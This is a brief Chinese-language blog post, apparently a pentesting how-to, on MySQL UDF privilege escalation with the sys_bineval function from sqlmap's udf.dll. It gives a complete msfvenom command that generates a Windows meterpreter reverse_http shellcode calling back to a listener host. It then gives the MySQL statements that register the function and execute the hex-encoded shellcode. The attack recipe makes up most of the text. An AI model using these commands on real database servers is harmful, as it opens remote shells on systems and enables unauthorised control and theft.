介绍:

执行shellcode – sys_bineval

sqmapl自带udf.dll中存在函数’sys_bineval,执行shellcode – sys_bineval

利用:

MSF生成shellcode:

msfvenom -p windows/meterpreter/reverse_http EXITFUNC=thread LPORT=8080 LHOST=172.16.229.139 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > test.txt ;cat test.txt |xxd -c 9999 -ps

mysql执行:

创建函数:create function sys_bineval returns int soname 'udf.dll';

测试执行:select sys_bineval("whoami")

mysql UDF提权 sys_bineval

 

执行shellcode

select sys_bineval(0x.........);

mysql UDF提权 sys_bineval

 

相关文章:

  • 2021-09-24
  • 2021-12-21
  • 2021-11-05
  • 2021-08-23
  • 2021-09-10
  • 2022-12-23
  • 2022-01-21
  • 2022-02-07
猜你喜欢
  • 2022-01-31
  • 2021-10-21
  • 2021-11-13
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案